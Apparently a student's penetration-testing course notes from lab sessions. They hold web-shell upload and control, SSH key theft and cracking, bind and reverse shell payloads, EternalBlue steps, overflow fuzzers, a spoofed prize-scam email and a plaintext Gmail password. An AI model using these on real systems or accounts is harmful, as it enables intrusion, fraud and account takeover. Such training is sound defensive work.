PC137425 07.01.2019 buffer overflow?? karaktirisik gjuha "C" import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("127.0.0.1",25)) s.recv(1024) s.send("ehlo google.com\r\n") s.recv(1024) required: win7 fresh install immunity debugger cka presim prej keti moduli me bo: simple exploit advanced exploit existing exploit xp me bo per win7 apo win10 ================= nmap 172.16.65.1 -p 80 nmap 172.16.65.0/24 -p 80 --open found 172.16.65.132 download simple-backdoor.php /usr/share/webshells/php# ls cd Dekstop# cat simple-backdoor.php mv simple-backdoor.php tv.php upload on 172.16.65.132 curl http://172.16.65.132/jQuery/server/php/files/tv.php\?cmd\=cat+/etc/passwd na jep listen e users ne qat system ========================== nano exploit_jquery.py import requests while True: cmd = raw_input("> ") r = requests.get("http://172.16.65.132/jQuery/server/php/files/tv.php?cmd={}".format(cmd)) print r.text python exploit_jquery.py ========================== cat /etc/passwd ls /home/hot ##csf.zip found ls -al /home/hot/csf.zip ##check permissions ls -al /home/hot ##list files in that directory ls -al /home/hot/.ssh/ ##backup file permision rwx cat /home/hot/.ssh/backup ##private key found copy private key cane to id_rs.key ssh -i id_srahot.key hot@172.16.65.132 v ##Load key "id_rs.key": bad permissions chmod 600 id_sr.key ssh -i id_sr.key hot@172.16.65.132 ## key is encrypted ##bruteforce required ##prepare rockyou.txt ##john to be used /usr/sbin/ssh2john ssh2john /root/Desktop/id_srahot.key /Desktop/hash_id cat hash_id john hash_id --wordlist=rockyou.txt ## found key "mustang1" ssh hot@172.16.65.132 $cp csf.zip /var/www/html $unzip csf.zip cd csf see proceduren per portknocking found port 29, searchsploit haraka, /usr/share/exploitdb/ exploits/linux/remote/41162.py cp 41162.py /home/dardan/Desktop/41162.py nano 41162.py smtp port to be modified python 41162.py -c "nc -lvp 995 -e /bin/bash" -t root@haraka.test -m 172.16.65.132 nc 172.16.65.132 995 id python -c "import pty;pty.spawn('/bin/bash') ============================================================================================= ============================================================================================= 09.01.2019 3 folders to be created: apps explicit-Dev exploits qa ka mu mesu: smush the stack ( means doing buffer overflow) ne stack, ruhen variablat, funksionet ,,, patternts ?? nje cikel i perseritjes se nje ngjarje offset ?? struktura e nje exploit (vul. assesment)?? run a service scan the IP that runs that service nmap 172.16.60.x -p10000 psh telnet 172.16.60.x 10000 hello ##me dergu te dhena, na kthen pergjigje ne screen te service i sheh logs funksionet get/put get #duhet mi deklaru sa byte i pranon ( 1 byte nje karakter) nese i qet 13 byte... kjo i bjen qe po shkaktojm overflow pra vull. eshte ne put function fuzzing #nese qojm psh i dergon 10 bte tani prap 10 tani prap 10 deri kur crash immunity debugger e sheh ne memory sa byte po dergohen BufferOverflow/exploits ----------------------------------------- nano exploit_1.py import socket import sys s = socket.socket(soclket.AF_INIT, socket.SOCK_STREAM) s.connect((sys.argv[1], 10000)) s.send("hello\r\n") data =s.recv(1024) print data s.close() python exploit_1.py 172.16.60.x -------------------------------------- EIP ? me gjet sa AAA duhet ,,, /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -q 6a413969 ESP ? ne immunity debugger ctrl + F JMP ESP nano exploit_2.py demo ne immunity debugger me gjeneru patterns, me gju me patters Targetin e jo me psh AAA.. me komuniku me applkacion me crash appin me gjet sa i duhen me crash app me msfvenom -p windows/shell_bind_tcp LPORT=4444 -f c-b "\x00" kernel32.dll ============================================================================================= ============================================================================================= 14.01.2019 Objektivat Target: 172.16.65.138 Objektivi: ne porten 21, dyshohet me kon vullnerable exploiti per qat service eshte per winXP tash qat service eshte tu e run ne win7 kerkesa eshte me modifiku per win7 Targeti: me hack 172.16.65.138 stage2 keti PoC me ja shtu vull scaner me librarin netaddr, funksioni network dardan@kali:~/Desktop/exploits/exploits$ python vull.py 172.16.60.75 Stage3 me bo me multi threding ============================================================================================= ============================================================================================= 16.01.2019 fuzzing, ident. brake points identifikimi i limiteve (memory, disk TO identify brake point nano smtp.py import socket import system s = socket.socket(socket.AF.INET, socket.SOCK_STREAM) s.connect((sys.argv[1],25) data = s.recv(1024) s.close() ---------------------------------- import socket import sys for i in range(1, 1000): c = "A" * i s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1],25)) data = s.recv(1024) s.send("ehlo google.com\r\n") data = s.recv(1024) s.send("mail from:{}\r\n".format(c)) data = s.recv(1024) if "553" in data: print ("Limit is {}".format(i)) break s.close() python smtp.py 127.0.0.1 ---------------------------- import socket import sys for i in range(1, 1000): c = "A" * i s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1],25)) data = s.recv(1024) s.send("ehlo google.com\r\n") data = s.recv(1024) s.send("mail from:a\r\n") data = s.recv(1024) s.send("rcpt to:{}\r\n".format(c)) data = s.recv(1024) if "553 5.1.0" in data: print ("Limit is {}".format(i)) break s.close() python smtp.py 127.0.0.1 ---------------------------- sudo apt-get install mailutils sudo apt-get install sendmail telnet 127.0.0.1 25 ehlo google.com ----------------------------------------------- nmap 127.0.0.1 -p25 telnet 127.0.0.1 25 ehlo google.com mail from:bill@microsoft.com rcpt to:tima@for4mail.com data hello from:bill@microsoft.com hi this bill gates, you won 1 m dollar. Kind Regards Bill . quit ----------------------------------------------- google search: allow less security apps off to ON google search: pop commands openssl s_client -connect pop.gmail.com:995 USER habibihabib73@gmail.com PASS cyber123456 ============================================================================================= 18.01.2019 pycharm create new project create new file test.py create new file mail_client.py create new file server_manager.py create new file email_manager.py ============================================================================================= ============================================================================================= 23.01.2019 ... sudo nasm -f bin eternalblue_kshellcode_x64.asm ls cat eternalblue_sc_merge.py tool: tmux nmap -p 445 172.16.60.94 --script smb-vuln-ms17-010 exploit -j -z jobs -k 0 cd shellcode /remove nano eternalblue_sc_merge.py /copy msfvenom msfvenom -p windows/x64/shell_reverse_tcp -f raw sc_x64_msf.bin EXITFUN=thread LHOST=172.16.60.94 LPORT=xxxxx set EXITFUN thread exploit -j -v python eternalblue_exploit7.py 182.16.x.x shellcode/ .... exploit7 me shendrru ne librari krej subnetit scan per eternal blue, me exploit, payload mkdir EB nano main.py /veq a eshte porta 445 qel, app me scanu IP range ============================================================================================= ============================================================================================= 26.01.2019 ... ============================================================================================= ============================================================================================= 28.01.2019 bla bla ============================================================================================= 30.01.2019 sjam kon ============================================================================================= 01.02.2019 sjam kon ============================================================================================= 04.02.2019 pen test? before pent test - understanding OS-s (not only win and Linux) services - vector of attack metoden per sulm red team - me gjet vull blue tram - me fix vull purple testing - mixed pen test... means capture the flag white box black box grey box